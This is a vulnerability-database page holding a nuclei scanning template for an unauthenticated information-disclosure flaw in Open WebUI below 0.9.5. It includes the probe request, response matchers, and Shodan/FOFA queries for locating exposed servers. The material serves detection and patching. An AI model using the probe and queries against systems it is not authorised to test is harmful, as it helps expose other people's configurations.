Lucene search
K

Open WebUI < 0.9.5 - Information Disclosure

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Open WebUI below 0.9.5 discloses RAG configuration via unauthenticated GET /api/v1/retrieval/.

Related
Refs
Code
id: CVE-2026-45397

info:
  name: Open WebUI < 0.9.5 - Information Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    Open WebUI < 0.9.5 contains an information disclosure vulnerability caused by unauthenticated access to GET /api/v1/retrieval/ endpoint, letting remote attackers retrieve live RAG pipeline configuration without authorization, exploit requires no authentication.
  impact: |
    Remote attackers can access sensitive configuration data without authentication, potentially aiding further attacks.
  remediation: |
    Update to version 0.9.5 or later.
  reference:
    - https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg
    - https://github.com/open-webui/open-webui
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45397
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-862
    cve-id: CVE-2026-45397
    epss-score: 0.0072
    epss-percentile: 0.4935
  metadata:
    verified: true
    max-request: 1
    vendor: openwebui
    product: open-webui
    shodan-query: title:"Open WebUI"
    fofa-query: title="Open WebUI"
  tags: cve,cve2026,open-webui,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/retrieval/"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "CHUNK_SIZE", "RAG_EMBEDDING_MODEL", "RAG_TEMPLATE")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100db7d9b00b3f15511bdbedca18a48c0b829817c4284535bb0ef63b73d168192fa02201095c050405419675d8a0114662722b667278fa600e8f549a409b2dd1bb9bca3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jun 2026 01:19Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.3
EPSS0.0072
SSVC
15